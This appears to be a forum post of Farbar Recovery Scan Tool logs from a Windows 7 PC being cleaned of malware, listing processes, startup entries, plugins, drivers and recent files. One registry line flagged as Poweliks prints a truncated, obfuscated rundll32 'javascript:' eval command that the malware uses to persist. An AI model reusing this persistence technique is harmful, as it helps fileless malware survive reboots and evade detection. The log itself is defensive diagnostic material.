2014-09-22 15:22 - 2012-10-09 22:51 - 00000000 ____D () C:\Users\Matts
2014-09-22 15:21 - 2014-09-22 15:21 - 00150568 _____ () C:\Windows\Minidump\092214-14554-01.dmp
2014-09-22 02:41 - 2012-10-09 22:57 - 00231568 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2014-09-21 19:08 - 2014-09-21 17:40 - 00000000 ____D () C:\ProgramData\PCDr
2014-09-21 19:08 - 2014-09-21 17:00 - 00000000 ____D () C:\Users\Matts\AppData\Roaming\PCDr
2014-09-21 19:03 - 2012-10-10 18:18 - 00000000 ____D () C:\Users\Matts\AppData\Local\Deployment
2014-09-21 19:02 - 2014-09-21 17:00 - 00000000 ____D () C:\temp
2014-09-21 18:52 - 2014-09-21 18:52 - 00000000 ____D () C:\Program Files\Broadcom
2014-09-21 18:50 - 2014-09-21 18:48 - 00000000 ____D () C:\Program Files\IDT
2014-09-21 18:49 - 2014-09-21 18:49 - 00000000 ____D () C:\Windows\system32\SRSLabs
2014-09-21 18:48 - 2013-10-28 10:27 - 00000000 ____D () C:\Program Files\InstallShield Installation Information
2014-09-21 18:43 - 2014-09-21 18:43 - 16906128 _____ () C:\Users\Matts\Downloads\R226903.exe
2014-09-21 18:43 - 2014-09-21 18:42 - 29222800 _____ () C:\Users\Matts\Downloads\R232587.exe
2014-09-21 18:43 - 2014-09-21 18:42 - 18620936 _____ () C:\Users\Matts\Downloads\R258891.exe
2014-09-21 17:41 - 2014-09-21 17:41 - 00000000 ____D () C:\Users\Matts\AppData\Roaming\Dell
2014-09-21 17:40 - 2014-09-21 17:40 - 00000000 ____D () C:\ProgramData\PC-Doctor for Windows
2014-09-21 17:40 - 2014-09-21 17:40 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dell
2014-09-21 17:40 - 2014-09-21 17:40 - 00000000 ____D () C:\Program Files\Dell Support Center
2014-09-21 17:40 - 2014-09-21 17:15 - 00000000 ____D () C:\Program Files\My Dell
2014-09-21 16:59 - 2014-09-21 16:59 - 00000000 ____D () C:\Users\Matts\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dell
2014-09-21 16:58 - 2014-09-21 16:58 - 00420552 _____ () C:\Users\Matts\Downloads\DellSystemDetect.exe
2014-09-21 16:56 - 2014-09-21 16:56 - 00000000 ____D () C:\Users\Matts\AppData\Local\Microsoft_Corporation
2014-09-21 16:44 - 2012-10-09 22:51 - 00000000 __SHD () C:\Recovery
2014-09-20 12:08 - 2014-09-20 12:08 - 00000017 _____ () C:\Users\Matts\AppData\Local\resmon.resmoncfg
2014-09-20 08:16 - 2014-09-20 08:16 - 00002617 _____ () C:\Users\Matts\Downloads\download.dlm
2014-09-20 00:36 - 2014-09-20 00:36 - 00000000 _____ () C:\Windows\setuperr.log
2014-09-20 00:36 - 2009-07-14 00:53 - 00032580 _____ () C:\Windows\Tasks\SCHEDLGU.TXT
2014-09-19 23:54 - 2014-09-19 23:26 - 00000000 ____D () C:\Users\Matts\AppData\Local\NPE
2014-09-19 23:38 - 2014-09-19 23:38 - 00000000 ____D () C:\NPE
2014-09-19 23:26 - 2014-09-19 23:26 - 00000000 ____D () C:\ProgramData\Norton
2014-09-19 21:42 - 2012-10-10 02:35 - 00000000 ____D () C:\Windows\Panther
2014-09-19 20:06 - 2009-07-13 22:37 - 00000000 ____D () C:\Windows\rescache
2014-09-19 19:18 - 2012-10-10 13:33 - 00701104 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerApp.exe
2014-09-19 19:18 - 2012-10-10 13:33 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerCPLApp.cpl
2014-09-14 19:30 - 2009-07-13 22:37 - 00000000 ____D () C:\Windows\Microsoft.NET
2014-09-14 18:51 - 2014-09-14 18:51 - 00000965 _____ () C:\Users\Public\Desktop\CCleaner.lnk
2014-09-14 18:51 - 2014-09-14 18:51 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
2014-09-14 18:51 - 2013-01-08 12:23 - 00000000 ____D () C:\Program Files\CCleaner
2014-09-14 18:35 - 2009-07-14 00:52 - 00000000 ____D () C:\Windows\addins
2014-09-14 18:19 - 2014-09-14 18:19 - 00001060 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-09-14 18:19 - 2014-09-14 18:19 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-09-14 18:19 - 2014-09-14 18:19 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-09-14 18:19 - 2012-10-10 15:18 - 00000000 ____D () C:\Users\Matts\AppData\Roaming\Malwarebytes
2014-09-14 18:19 - 2012-10-10 15:17 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-09-14 18:19 - 2012-10-10 15:17 - 00000000 ____D () C:\Program Files\Malwarebytes' Anti-Malware
2014-09-14 18:07 - 2009-07-13 22:37 - 00000000 ____D () C:\Windows\system32\NDF
2014-09-11 23:08 - 2014-09-11 23:08 - 00000000 ____D () C:\958f45868474b8ea08185f0d725a
2014-09-11 23:08 - 2013-07-18 09:36 - 00000000 ____D () C:\Windows\system32\MRT
2014-09-11 23:08 - 2012-10-17 21:06 - 98758480 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2014-09-11 23:08 - 2012-10-09 23:14 - 00002117 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Security Essentials.lnk
2014-09-11 23:08 - 2012-10-09 23:14 - 00001945 _____ () C:\Windows\epplauncher.mif
2014-09-11 23:08 - 2012-10-09 23:14 - 00000000 ____D () C:\Program Files\Microsoft Security Client
2014-09-09 17:47 - 2014-09-24 09:36 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll
2014-08-27 15:08 - 2014-08-27 15:08 - 00000000 __SHD () C:\Users\Matts\AppData\Local\EmieUserList
2014-08-27 15:08 - 2014-08-27 15:08 - 00000000 __SHD () C:\Users\Matts\AppData\Local\EmieSiteList

==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2014-09-19 19:59

==================== End Of Log ============================

Here is a log from C:\FRST\Logs:

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 25-09-2014
Ran by Matts (administrator) on MATTS-PC on 25-09-2014 10:51:39
Running from C:\Users\Matts\Desktop
Loaded Profile: Matts (Available profiles: Matts)
Platform: Microsoft Windows 7 Professional  Service Pack 1 (X86) OS Language: English (United States)
Internet Explorer Version 11
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(AMD) C:\Windows\System32\atiesrxx.exe
(IDT, Inc.) C:\Windows\System32\DriverStore\FileRepository\stwrt.inf_x86_neutral_7f2308f435f2c4c1\stacsv.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Andrea Electronics Corporation) C:\Windows\System32\DriverStore\FileRepository\stwrt.inf_x86_neutral_7f2308f435f2c4c1\AEstSrv.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\NisSrv.exe
(Microsoft Corporation) C:\Windows\System32\WerFault.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
(IDT, Inc.) C:\Program Files\IDT\WDM\sttray.exe
(Oracle Corporation) C:\Program Files\Common Files\Java\Java Update\jusched.exe
(Dell) C:\Users\Matts\AppData\Local\Apps\2.0\W22XG8XY.X98\VYHXE5MW.KWW\dell..tion_0f612f649c4a10af_0005.000b_17ede8fa7a4e5cac\DellSystemDetect.exe
(McAfee, Inc.) C:\Program Files\McAfee Security Scan\3.8.150\SSScheduler.exe
(Microsoft Corporation) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
(Microsoft Corporation) C:\Windows\System32\wermgr.exe
(Microsoft Corporation) C:\Windows\System32\taskmgr.exe
(Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
(Microsoft Corporation) C:\Windows\System32\wermgr.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Corporation) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
(Microsoft Corporation) C:\Windows\System32\wermgr.exe


==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [974432 2014-08-22] (Microsoft Corporation)
HKLM\...\Run: [Adobe ARM] => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [958576 2013-09-05] (Adobe Systems Incorporated)
HKLM\...\Run: [SysTrayApp] => C:\Program Files\IDT\WDM\sttray.exe [458844 2009-06-29] (IDT, Inc.)
HKLM\...\Run: [SunJavaUpdateSched] => C:\Program Files\Common Files\Java\Java Update\jusched.exe [256896 2014-07-25] (Oracle Corporation)
HKU\S-1-5-21-3021788917-465817279-1536284282-1000\...\Run: [DellSystemDetect] => C:\Users\Matts\AppData\Local\Apps\2.0\W22XG8XY.X98\VYHXE5MW.KWW\dell..tion_0f612f649c4a10af_0005.000b_17ede8fa7a4e5cac\DellSystemDetect.exe [267328 2014-09-21] (Dell)
HKU\S-1-5-21-3021788917-465817279-1536284282-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\McAfee Security Scan Plus.lnk
ShortcutTarget: McAfee Security Scan Plus.lnk -> C:\Program Files\McAfee Security Scan\3.8.150\SSScheduler.exe (McAfee, Inc.)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.msn.com/?ocid=EIE9HP&PC=UP50
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://www.msn.com/
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 0xDC9F3545A5CFCF01
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-US
BHO: MSS+ Identifier -> {0E8A89AD-95D7-40EB-8D9D-083EF7066A01} -> C:\Program Files\McAfee Security Scan\3.8.150\McAfeeMSS_IE.dll (McAfee, Inc.)
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files\Common Files\Skype\Skype4COM.dll (Skype Technologies)
Winsock: Catalog5 07 C:\Program Files\Bonjour\mdnsNSP.dll [121704] (Apple Inc.)
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1

FireFox:
========
FF ProfilePath: C:\Users\Matts\AppData\Roaming\Mozilla\Firefox\Profiles\6m5pp8gy.default
FF SearchEngineOrder.1: Ask Search
FF SelectedSearchEngine: user_pref("browser.search.selectedEngine", "");
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32_15_0_0_152.dll ()
FF Plugin: @adobe.com/ShockwavePlayer -> C:\Windows\system32\Adobe\Director\np32dsw_1167637.dll (Adobe Systems, Inc.)
FF Plugin: @Apple.com/iTunes,version=1.0 -> C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin: @java.com/DTPlugin,version=10.67.2 -> C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=10.67.2 -> C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~4\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MICROS~4\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin: @pandonetworks.com/PandoWebPlugin -> C:\Program Files\Pando Networks\Media Booster\npPandoWebPlugin.dll No File
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Extension: Oovoo Toolbar - C:\Users\Matts\AppData\Roaming\Mozilla\Firefox\Profiles\6m5pp8gy.default\Extensions\toolbar_OVO2V7@apn.ask.com.xpi [2013-08-27]
FF Extension: Adblock Plus - C:\Users\Matts\AppData\Roaming\Mozilla\Firefox\Profiles\6m5pp8gy.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2014-09-22]
FF Extension: Hotspot Shield Extension - C:\Program Files\Mozilla Firefox\browser\extensions\afproxy@anchorfree.com [2014-09-24]
FF HKCU\...\Firefox\Extensions: [{e4f94d1e-2f53-401e-8885-681602c0ddd8}] - C:\ProgramData\McAfee Security Scan\Extensions\{e4f94d1e-2f53-401e-8885-681602c0ddd8}.xpi
FF Extension: No Name - C:\ProgramData\McAfee Security Scan\Extensions\{e4f94d1e-2f53-401e-8885-681602c0ddd8}.xpi [2014-04-04]

Chrome:
=======

========================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

S3 AOL ACS; C:\Program Files\Common Files\AOL\ACS\AOLAcsd.exe [46640 2006-10-23] (AOL LLC)
S3 McComponentHostService; C:\Program Files\McAfee Security Scan\3.8.150\McCHSvc.exe [235696 2014-04-09] (McAfee, Inc.)
R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [22192 2014-08-22] (Microsoft Corporation)
R3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [288120 2014-08-22] (Microsoft Corporation)
R2 STacSV; C:\Windows\System32\DriverStore\FileRepository\stwrt.inf_x86_neutral_7f2308f435f2c4c1\STacSV.exe [221266 2009-06-29] (IDT, Inc.)

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

S3 hamachi; C:\Windows\System32\DRIVERS\hamachi.sys [26176 2009-03-18] (LogMeIn, Inc.)
R3 itecir; C:\Windows\System32\DRIVERS\itecir.sys [65640 2010-07-13] (ITE Tech. Inc. )
R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [231800 2014-07-17] (Microsoft Corporation)
R3 wanatw; C:\Windows\System32\DRIVERS\wanatw4.sys [33588 2006-11-29] (America Online, Inc.)
S1 MpKsl8c5a2e11; \??\c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{75D41F0A-42E8-498F-AC63-699978EC903E}\MpKsl8c5a2e11.sys [X]
S1 MpKsla09b7e5b; \??\c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{75D41F0A-42E8-498F-AC63-699978EC903E}\MpKsla09b7e5b.sys [X]
S3 taphss6; system32\DRIVERS\taphss6.sys [X]
S3 vtany; \??\C:\Windows\vtany.sys [X]

==================== NetSvcs (Whitelisted) ===================


(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)


==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-09-25 10:46 - 2014-09-25 10:46 - 00150568 _____ () C:\Windows\Minidump\092514-22401-01.dmp
2014-09-25 10:03 - 2014-09-25 10:51 - 00009693 _____ () C:\Users\Matts\Desktop\FRST.txt
2014-09-25 10:03 - 2014-09-25 10:03 - 00000000 ____D () C:\Users\Matts\Desktop\FRST-OlderVersion
2014-09-25 09:50 - 2014-09-25 09:53 - 00036927 _____ () C:\Users\Matts\Downloads\FRST.txt
2014-09-24 23:41 - 2014-09-24 23:40 - 00003231 _____ () C:\Users\Matts\Documents\attach.zip
2014-09-24 23:40 - 2014-09-24 23:40 - 00003231 _____ () C:\Users\Matts\Desktop\attach.zip
2014-09-24 23:24 - 2014-09-24 23:24 - 00000000 ____D () C:\Program Files\Mozilla Firefox
2014-09-24 22:56 - 2014-09-24 22:56 - 00144392 _____ () C:\Windows\Minidump\092414-11060-01.dmp
2014-09-24 22:52 - 2014-09-24 22:52 - 00150568 _____ () C:\Windows\Minidump\092414-15834-01.dmp
2014-09-24 22:41 - 2014-09-24 22:41 - 00144392 _____ () C:\Windows\Minidump\092414-12277-01.dmp
2014-09-24 22:40 - 2014-09-24 22:40 - 00003280 ____N () C:\bootsqm.dat
2014-09-24 09:36 - 2014-09-09 17:47 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll
2014-09-24 09:34 - 2014-09-24 09:34 - 00000000 ____D () C:\Users\Matts\Downloads\ProcessMonitor
2014-09-24 09:29 - 2014-09-24 09:29 - 01121208 _____ () C:\Users\Matts\Downloads\ProcessMonitor.zip
2014-09-24 00:06 - 2014-09-24 00:10 - 00000000 ____D () C:\Users\Matts\Downloads\ProcessExplorer
2014-09-24 00:05 - 2014-09-24 00:05 - 01188194 _____ () C:\Users\Matts\Downloads\ProcessExplorer.zip
2014-09-23 23:18 - 2014-09-23 23:18 - 00144392 _____ () C:\Windows\Minidump\092314-12776-01.dmp
2014-09-23 22:59 - 2014-09-23 22:59 - 00000207 _____ () C:\Windows\tweaking.com-regbackup-MATTS-PC-Microsoft-Windows-7-Professional-(32-bit).dat
2014-09-23 22:59 - 2014-09-23 22:59 - 00000000 ____D () C:\RegBackup
2014-09-23 22:49 - 2014-09-23 22:49 - 00002117 _____ () C:\Users\Matts\Desktop\Tweaking.com - Windows Repair (All in One).lnk
2014-09-23 22:49 - 2014-09-23 22:49 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tweaking.com
2014-09-23 22:49 - 2014-09-23 22:49 - 00000000 ____D () C:\Program Files\Tweaking.com
2014-09-23 22:48 - 2014-09-23 22:48 - 09690792 _____ () C:\Users\Matts\Downloads\tweaking.com_windows_repair_aio_setup.exe
2014-09-23 22:44 - 2014-09-23 22:44 - 00005635 _____ () C:\Windows\system32\jupdate-1.7.0_67-b01.log
2014-09-23 22:44 - 2014-09-23 22:44 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2014-09-23 22:44 - 2014-09-23 22:44 - 00000000 ____D () C:\Program Files\Common Files\Java
2014-09-23 22:44 - 2014-07-25 12:55 - 00096680 _____ (Oracle Corporation) C:\Windows\system32\WindowsAccessBridge.dll
2014-09-23 22:44 - 2014-07-25 12:49 - 00272808 _____ (Oracle Corporation) C:\Windows\system32\javaws.exe
2014-09-23 22:44 - 2014-07-25 12:49 - 00175528 _____ (Oracle Corporation) C:\Windows\system32\javaw.exe
2014-09-23 22:44 - 2014-07-25 12:49 - 00175528 _____ (Oracle Corporation) C:\Windows\system32\java.exe
2014-09-23 22:43 - 2014-09-23 22:43 - 00918440 _____ (Oracle Corporation) C:\Users\Matts\Downloads\jre-7u67-windows-i586-iftw.exe
2014-09-23 15:12 - 2014-09-23 15:12 - 00000633 _____ () C:\Users\Matts\Desktop\JRT.txt
2014-09-22 23:01 - 2014-09-22 23:01 - 02347384 _____ (ESET) C:\Users\Matts\Downloads\esetsmartinstaller_enu.exe
2014-09-22 23:01 - 2014-09-22 23:01 - 00000000 ____D () C:\Program Files\ESET
2014-09-22 22:34 - 2014-09-22 22:34 - 00000000 ____D () C:\Windows\ERUNT
2014-09-22 22:32 - 2014-09-22 22:33 - 01024790 _____ (Thisisu) C:\Users\Matts\Desktop\JRT.exe
2014-09-22 22:20 - 2014-09-22 22:20 - 01373475 _____ () C:\Users\Matts\Downloads\adwcleaner_3.310.exe
2014-09-22 21:28 - 2014-09-22 21:29 - 00448512 _____ (OldTimer Tools) C:\Users\Matts\Downloads\TFC.exe
2014-09-22 21:18 - 2014-09-22 21:18 - 00002040 _____ () C:\Users\Matts\Desktop\Rkill.txt
2014-09-22 21:09 - 2014-09-22 21:09 - 01944824 _____ (Bleeping Computer, LLC) C:\Users\Matts\Downloads\rkill.exe
2014-09-22 21:05 - 2014-09-22 21:14 - 00033900 _____ () C:\Users\Matts\Downloads\Result.txt
2014-09-22 21:04 - 2014-09-22 21:04 - 00401920 _____ (Farbar) C:\Users\Matts\Downloads\MiniToolBox.exe
2014-09-22 20:54 - 2014-09-22 20:54 - 00001063 _____ () C:\Users\Matts\Documents\malwarebytes922.txt
2014-09-22 20:50 - 2014-09-22 20:50 - 00002759 _____ () C:\Users\Matts\Downloads\FSS.txt
2014-09-22 20:49 - 2014-09-22 20:49 - 00415232 _____ (Farbar) C:\Users\Matts\Downloads\FSS.exe
2014-09-22 20:46 - 2014-09-22 20:46 - 00854417 _____ () C:\Users\Matts\Downloads\SecurityCheck.exe
2014-09-22 20:43 - 2014-09-22 20:43 - 00150568 _____ () C:\Windows\Minidump\092214-18049-01.dmp
2014-09-22 19:54 - 2014-09-22 19:55 - 14349744 _____ (Malwarebytes Corp.) C:\Users\Matts\Downloads\mbar-1.07.0.1012.exe
2014-09-22 19:31 - 2014-09-22 19:31 - 00150568 _____ () C:\Windows\Minidump\092214-12261-01.dmp
2014-09-22 18:54 - 2014-09-25 10:51 - 00000000 ____D () C:\FRST
2014-09-22 18:54 - 2014-09-25 10:03 - 01100800 _____ (Farbar) C:\Users\Matts\Desktop\FRST.exe
2014-09-22 15:30 - 2014-09-24 22:50 - 00014933 _____ () C:\Users\Matts\Desktop\dds.txt
2014-09-22 15:30 - 2014-09-24 22:50 - 00013684 _____ () C:\Users\Matts\Desktop\attach.txt
2014-09-22 15:24 - 2014-09-22 15:24 - 00688992 ____R (Swearware) C:\Users\Matts\Downloads\dds.com
2014-09-22 15:21 - 2014-09-25 10:46 - 253082706 _____ () C:\Windows\MEMORY.DMP
2014-09-22 15:21 - 2014-09-22 15:21 - 00150568 _____ () C:\Windows\Minidump\092214-14554-01.dmp
2014-09-21 18:52 - 2014-09-21 18:52 - 00000000 ____D () C:\Program Files\Broadcom
2014-09-21 18:49 - 2014-09-21 18:49 - 00000000 ____D () C:\Windows\system32\SRSLabs
2014-09-21 18:49 - 2009-06-29 12:44 - 12021852 _____ (IDT, Inc.) C:\Windows\system32\idtcpl.cpl
2014-09-21 18:49 - 2009-06-29 12:44 - 03600384 _____ (IDT, Inc.) C:\Windows\system32\stlang.dll
2014-09-21 18:49 - 2009-06-29 12:44 - 00536576 _____ (IDT, Inc.) C:\Windows\system32\idtmini1.exe
2014-09-21 18:49 - 2009-05-12 14:26 - 00047104 _____ (Creative Technology Ltd.) C:\Windows\system32\ctppld.dll
2014-09-21 18:49 - 2009-05-12 14:25 - 00511488 _____ (Creative Technology Ltd.) C:\Windows\system32\ctapo32.dll
2014-09-21 18:49 - 2009-03-02 12:57 - 00142848 _____ (Andrea Electronics Corporation) C:\Windows\system32\aestacap.dll
2014-09-21 18:49 - 2009-03-02 12:57 - 00061440 _____ (Andrea Electronics Corporation) C:\Windows\system32\aestaren.dll
2014-09-21 18:49 - 2009-03-02 12:47 - 00086016 _____ (Andrea Electronics Corporation) C:\Windows\system32\AESTCom.dll
2014-09-21 18:49 - 2009-03-02 12:08 - 00368640 _____ (Andrea Electronics Corporation) C:\Windows\system32\aestecap.dll
2014-09-21 18:48 - 2014-09-21 18:50 - 00000000 ____D () C:\Program Files\IDT
2014-09-21 18:48 - 2009-06-29 12:44 - 00914944 _____ (IDT, Inc.) C:\Windows\system32\stapo.dll
2014-09-21 18:48 - 2009-06-29 12:44 - 00485888 ____N (IDT, Inc.) C:\Windows\system32\stapi32.dll
2014-09-21 18:48 - 2009-06-29 12:44 - 00408576 _____ (IDT, Inc.) C:\Windows\system32\Drivers\stwrt.sys
2014-09-21 18:48 - 2009-06-29 12:44 - 00405504 _____ (IDT, Inc.) C:\Windows\system32\stcplx.dll
2014-09-21 18:48 - 2009-06-29 12:44 - 00175616 _____ (IDT, Inc.) C:\Windows\system32\st326217.dll
2014-09-21 18:43 - 2014-09-21 18:43 - 16906128 _____ () C:\Users\Matts\Downloads\R226903.exe
2014-09-21 18:42 - 2014-09-21 18:43 - 29222800 _____ () C:\Users\Matts\Downloads\R232587.exe
2014-09-21 18:42 - 2014-09-21 18:43 - 18620936 _____ () C:\Users\Matts\Downloads\R258891.exe
2014-09-21 17:41 - 2014-09-21 17:41 - 00000000 ____D () C:\Users\Matts\AppData\Roaming\Dell
2014-09-21 17:40 - 2014-09-21 19:08 - 00000000 ____D () C:\ProgramData\PCDr
2014-09-21 17:40 - 2014-09-21 17:40 - 00000000 ____D () C:\ProgramData\PC-Doctor for Windows
2014-09-21 17:40 - 2014-09-21 17:40 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dell
2014-09-21 17:40 - 2014-09-21 17:40 - 00000000 ____D () C:\Program Files\Dell Support Center
2014-09-21 17:15 - 2014-09-21 17:40 - 00000000 ____D () C:\Program Files\My Dell
2014-09-21 17:00 - 2014-09-21 19:08 - 00000000 ____D () C:\Users\Matts\AppData\Roaming\PCDr
2014-09-21 17:00 - 2014-09-21 19:02 - 00000000 ____D () C:\temp
2014-09-21 16:59 - 2014-09-21 16:59 - 00000000 ____D () C:\Users\Matts\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dell
2014-09-21 16:58 - 2014-09-21 16:58 - 00420552 _____ () C:\Users\Matts\Downloads\DellSystemDetect.exe
2014-09-21 16:56 - 2014-09-21 16:56 - 00000000 ____D () C:\Users\Matts\AppData\Local\Microsoft_Corporation
2014-09-20 15:47 - 2014-09-24 08:49 - 00001324 _____ () C:\Windows\PFRO.log
2014-09-20 15:30 - 2014-09-22 22:30 - 00000000 ____D () C:\AdwCleaner
2014-09-20 12:08 - 2014-09-20 12:08 - 00000017 _____ () C:\Users\Matts\AppData\Local\resmon.resmoncfg
2014-09-20 08:36 - 2014-09-25 00:17 - 00000000 ____D () C:\Users\Matts\AppData\Local\CrashDumps
2014-09-20 08:16 - 2014-09-20 08:16 - 00002617 _____ () C:\Users\Matts\Downloads\download.dlm
2014-09-20 00:36 - 2014-09-25 10:46 - 00002007 _____ () C:\Windows\setupact.log
2014-09-20 00:36 - 2014-09-20 00:36 - 00000000 _____ () C:\Windows\setuperr.log
2014-09-19 23:38 - 2014-09-19 23:38 - 00000000 ____D () C:\NPE
2014-09-19 23:26 - 2014-09-19 23:54 - 00000000 ____D () C:\Users\Matts\AppData\Local\NPE
2014-09-19 23:26 - 2014-09-19 23:26 - 00000000 ____D () C:\ProgramData\Norton
2014-09-14 20:35 - 2014-09-22 20:07 - 00000000 ____D () C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2014-09-14 20:34 - 2014-09-22 20:07 - 00000000 ____D () C:\Users\Matts\Desktop\mbar
2014-09-14 18:51 - 2014-09-14 18:51 - 00000965 _____ () C:\Users\Public\Desktop\CCleaner.lnk
2014-09-14 18:51 - 2014-09-14 18:51 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
2014-09-14 18:19 - 2014-09-22 20:52 - 00110296 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-09-14 18:19 - 2014-09-22 19:55 - 00075480 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-09-14 18:19 - 2014-09-14 18:19 - 00001060 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-09-14 18:19 - 2014-09-14 18:19 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-09-14 18:19 - 2014-09-14 18:19 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-09-14 18:19 - 2014-05-12 07:26 - 00051928 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
